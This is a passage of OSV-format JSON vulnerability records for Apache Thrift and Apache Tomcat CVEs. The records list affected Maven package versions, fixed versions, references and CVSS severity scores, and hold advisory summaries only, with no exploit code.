"severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-wjxj-f8rg-99wx", "published": "2019-01-17T13:56:40Z", "modified": "2024-03-14T05:20:15.449375Z", "aliases": [ "CVE-2018-1320" ], "related": [ "CGA-w2gp-wc62-wqxq" ], "summary": "Improper Input Validation in Apache Thrift", "details": "Apache Thrift Java client library versions 0.5.0 prior to 0.9.3-1 and 0.10.0 prior to 0.12.0 can bypass SASL negotiation isComplete validation in the org.apache.thrift.transport.TSaslTransport class. An assert used to determine if the SASL handshake had successfully completed could be disabled in production settings making the validation incomplete.", "affected": [ { "package": { "name": "org.apache.thrift:libthrift", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.thrift/libthrift" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0.5.0" }, { "fixed": "0.9.3-1" } ] } ], "versions": [ "0.6.1", "0.7.0", "0.8.0", "0.9.0", "0.9.1", "0.9.2", "0.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-wjxj-f8rg-99wx/GHSA-wjxj-f8rg-99wx.json" } }, { "package": { "name": "org.apache.thrift:libthrift", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.thrift/libthrift" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0.10.0" }, { "fixed": "0.12.0" } ] } ], "versions": [ "0.10.0", "0.11.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-wjxj-f8rg-99wx/GHSA-wjxj-f8rg-99wx.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1320" }, { "type": "WEB", "url": "https://github.com/apache/thrift/commit/7489ed6ac8bad64e72fa83ec9d53e1eeddca6c23" }, { "type": "WEB", "url": "https://github.com/apache/thrift/commit/d973409661f820d80d72c0034d06a12348c8705e" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://web.archive.org/web/20200227094237/http://www.securityfocus.com/bid/106551" }, { "type": "WEB", "url": "https://support.f5.com/csp/article/K36361684" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/02/msg00008.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4d3f1d3e333d9c2b2f6e6ae8ed8750d4de03410ac294bcd12c7eefa3@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3d71a6dbb063aa61ba81278fe622b20bfe7501bb3821c27695641ac3@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r261972a3b14cf6f1dcd94b1b265e9ef644a38ccdf0d0238fa0c4d459@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2278846f7ab06ec07a0aa31457235e0ded9191b216cba55f3f315f16@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1015eaadef8314daa9348aa423086a732cfeb998ceb5d42605c9b0b5@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r09c3dcdccf4b74ad13bda79b354e6b793255ccfe245cca1b8cee23f5@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e825ff2f4e129c0ecdb6a19030b53c1ccdf810a8980667628d0c6a80@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/dfee89880c84874058c6a584d8128468f8d3c2ac25068ded91073adc@%3Cuser.storm.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/dbe3a39b48900318ad44494e8721f786901ba4520cd412c7698f534f@%3Cdev.storm.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/da5234b5e78f1c99190407f791dfe1bf6c58de8d30d15974a9669be3@%3Cuser.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/8be5b16c02567fff61b1284e5df433a4e38617bc7de4804402bf62be@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6b07f6f618155c777191b4fad8ade0f0cf4ed4c12a1a746ce903d816@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d3b6849fcf4cd1e87703b3dde0d57aabeb9ba0193dc0cf3c97f545d@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/187684ac8b94d55256253f5220cb55e8bd568afdf9a8a86e9bbb66c9@%3Cdevnull.infra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/07c3cd5a2953a4b253eee4437b1397b1603d0f886437e19b657d2c54@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/THRIFT-4506" }, { "type": "WEB", "url": "https://github.com/apache/thrift/releases/tag/0.9.3.1" }, { "type": "PACKAGE", "url": "https://github.com/apache/thrift" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2413" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2019/07/24/3" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/106551" } ], "database_specific": { "cwe_ids": [ "CWE-20", "CWE-295" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T22:00:45Z", "nvd_published_at": "2019-01-07T17:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-27hp-xhwr-wr2m", "published": "2024-12-20T18:31:32Z", "modified": "2025-11-03T23:18:11.427349Z", "aliases": [ "BIT-tomcat-2024-56337", "CVE-2024-56337" ], "related": [ "CGA-6qvq-rhpg-rc66", "CGA-9w54-vfw9-4r27" ], "summary": "Apache Tomcat Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability", "details": "Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability in Apache Tomcat.\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.1, from 10.1.0-M1 through 10.1.33, from 9.0.0.M1 through 9.0.97.\n\nThe mitigation for CVE-2024-50379 was incomplete.\n\nUsers running Tomcat on a case insensitive file system with the default servlet write enabled (readonly initialisation \nparameter set to the non-default value of false) may need additional configuration to fully mitigate CVE-2024-50379 depending on which version of Java they are using with Tomcat:\n- running on Java 8 or Java 11: the system property sun.io.useCanonCaches must be explicitly set to false (it defaults to true)\n- running on Java 17: the system property sun.io.useCanonCaches, if set, must be set to false (it defaults to false)\n- running on Java 21 onwards: no further configuration is required (the system property and the problematic cache have been removed)\n\nTomcat 11.0.3, 10.1.35 and 9.0.99 onwards will include checks that sun.io.useCanonCaches is set appropriately before allowing the default servlet to be write enabled on a case insensitive file system. Tomcat will also set sun.io.useCanonCaches to false by default where it can.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.2" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-27hp-xhwr-wr2m/GHSA-27hp-xhwr-wr2m.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.34" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-27hp-xhwr-wr2m/GHSA-27hp-xhwr-wr2m.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.98" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-27hp-xhwr-wr2m/GHSA-27hp-xhwr-wr2m.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.2" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-27hp-xhwr-wr2m/GHSA-27hp-xhwr-wr2m.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.34" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-27hp-xhwr-wr2m/GHSA-27hp-xhwr-wr2m.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.98" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-27hp-xhwr-wr2m/GHSA-27hp-xhwr-wr2m.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-56337" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/b2b9qrgjrz1kvo4ym8y2wkfdvwoq6qbp" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00009.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20250103-0002" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-10.html#Fixed_in_Apache_Tomcat_10.1.34" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-11.html#Fixed_in_Apache_Tomcat_11.0.2" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.98" }, { "type": "WEB", "url": "https://www.cve.org/CVERecord?id=CVE-2024-50379" } ], "database_specific": { "cwe_ids": [ "CWE-367" ], "github_reviewed": true, "github_reviewed_at": "2024-12-20T19:50:45Z", "nvd_published_at": "2024-12-20T16:15:24Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U" } ] }, { "schema_version": "1.7.3", "id": "GHSA-2rvv-w9r2-rg7m", "published": "2021-05-13T22:30:02Z", "modified": "2024-03-11T16:46:40.808422Z", "aliases": [ "BIT-tomcat-2021-24122", "CVE-2021-24122" ], "related": [ "CGA-9cx5-82vv-8fp2" ], "summary": "Information Disclosure in Apache Tomcat", "details": "When serving resources from a network location using the NTFS file system, Apache Tomcat versions 10.0.0-M1 to 10.0.0-M9, 9.0.0.M1 to 9.0.39, 8.5.0 to 8.5.59 and 7.0.0 to 7.0.106 were susceptible to JSP source code disclosure in some configurations. The root cause was the unexpected behaviour of the JRE API File.getCanonicalPath() which in turn was caused by the inconsistent behaviour of the Windows API (FindFirstFileW) in some circumstances.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0-M1" }, { "fixed": "10.0.0-M10" } ] } ], "versions": [ "10.0.0-M1", "10.0.0-M3", "10.0.0-M4", "10.0.0-M5", "10.0.0-M6", "10.0.0-M7", "10.0.0-M8", "10.0.0-M9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 10.0.0-M9", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-2rvv-w9r2-rg7m/GHSA-2rvv-w9r2-rg7m.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0" }, { "fixed": "9.0.40" } ] } ], "versions": [ "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.5", "9.0.6", "9.0.7", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-2rvv-w9r2-rg7m/GHSA-2rvv-w9r2-rg7m.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.60" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-2rvv-w9r2-rg7m/GHSA-2rvv-w9r2-rg7m.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.0.107" } ] } ], "versions": [ "7.0.0", "7.0.100", "7.0.103", "7.0.104", "7.0.105", "7.0.106", "7.0.11", "7.0.12", "7.0.14", "7.0.16", "7.0.19", "7.0.2", "7.0.20", "7.0.21", "7.0.22", "7.0.23", "7.0.25", "7.0.26", "7.0.27", "7.0.28", "7.0.29", "7.0.30", "7.0.32", "7.0.33", "7.0.34", "7.0.35", "7.0.37", "7.0.39", "7.0.4", "7.0.40", "7.0.41", "7.0.42", "7.0.47", "7.0.5", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.6", "7.0.61", "7.0.62", "7.0.63", "7.0.64", "7.0.65", "7.0.67", "7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.76", "7.0.77", "7.0.78", "7.0.79", "7.0.8", "7.0.81", "7.0.82", "7.0.84", "7.0.85", "7.0.86", "7.0.88", "7.0.90", "7.0.91", "7.0.92", "7.0.93", "7.0.94", "7.0.96", "7.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-2rvv-w9r2-rg7m/GHSA-2rvv-w9r2-rg7m.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-24122" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/7f004ac4531c45f9a2a2d1470561fe135cf27bc2" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/800b03140e640f8892f27021e681645e8e320177" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/920dddbdb981f92e8d5872a4bb126a10af5ca8a9" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/935fc5582dc25ae10bab6f9d5629ff8d996cb533" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-8.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-7.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-10.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210212-0008" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/03/msg00018.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rca833c6d42b7b9ce1563488c0929f29fcc95947d86e5e740258c8937@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb32a73b7cb919d4f44a2596b6b951274c0004fc8b0e393d6829a45f9@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7e0bb9ea415724550e2b325e143b23e269579e54d66fcd7754bd0c20@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r776c64337495bf28b7d5597268114a888e3fad6045c40a0da0c66d4d@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7382e1e35b9bc7c8f320b90ad77e74c13172d08034e20c18000fe710@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1595889b083e05986f42b944dc43060d6b083022260b6ea64d2cec52@%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1595889b083e05986f42b944dc43060d6b083022260b6ea64d2cec52@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1595889b083e05986f42b944dc43060d6b083022260b6ea64d2cec52%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/01/14/1" } ], "database_specific": { "cwe_ids": [ "CWE-200", "CWE-706" ], "github_reviewed": true, "github_reviewed_at": "2021-04-06T21:27:31Z", "nvd_published_at": "2021-01-14T15:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-3p2h-wqq4-wf4h", "published": "2025-04-28T21:30:43Z", "modified": "2025-11-03T23:18:32.629791Z", "aliases": [ "BIT-tomcat-2025-31650", "CVE-2025-31650" ], "related": [ "CGA-757w-cc53-956r", "CGA-rwp2-7vfm-8j2c" ], "summary": "Apache Tomcat Denial of Service via invalid HTTP priority header", "details": "Improper Input Validation vulnerability in Apache Tomcat. Incorrect error handling for some invalid HTTP priority headers resulted in incomplete clean-up of the failed request which created a memory leak. A large number of such requests could trigger an OutOfMemoryException resulting in a denial of service.\n\nThis issue affects Apache Tomcat: from 9.0.76 through 9.0.102, from 10.1.10 through 10.1.39, from 11.0.0-M2 through 11.0.5. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.90 though 8.5.100.\n\nUsers are recommended to upgrade to version 9.0.104, 10.1.40 or 11.0.6 which fix the issue.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.76" }, { "fixed": "9.0.104" } ] } ], "versions": [ "9.0.100", "9.0.102", "9.0.76", "9.0.78", "9.0.79", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.102", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/04/GHSA-3p2h-wqq4-wf4h/GHSA-3p2h-wqq4-wf4h.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.10" }, { "fixed": "10.1.40" } ] } ], "versions": [ "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/04/GHSA-3p2h-wqq4-wf4h/GHSA-3p2h-wqq4-wf4h.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M2" }, { "fixed": "11.0.6" } ] } ], "versions": [ "11.0.0", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.2", "11.0.3", "11.0.4", "11.0.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/04/GHSA-3p2h-wqq4-wf4h/GHSA-3p2h-wqq4-wf4h.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.76" }, { "fixed": "9.0.104" } ] } ], "versions": [ "9.0.100", "9.0.102", "9.0.76", "9.0.78", "9.0.79", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.102", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/04/GHSA-3p2h-wqq4-wf4h/GHSA-3p2h-wqq4-wf4h.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.10" }, { "fixed": "10.1.40" } ] } ], "versions": [ "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/04/GHSA-3p2h-wqq4-wf4h/GHSA-3p2h-wqq4-wf4h.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M2" }, { "fixed": "11.0.6" } ] } ], "versions": [ "11.0.0", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.2", "11.0.3", "11.0.4", "11.0.5" ], "database_specific": { "source": 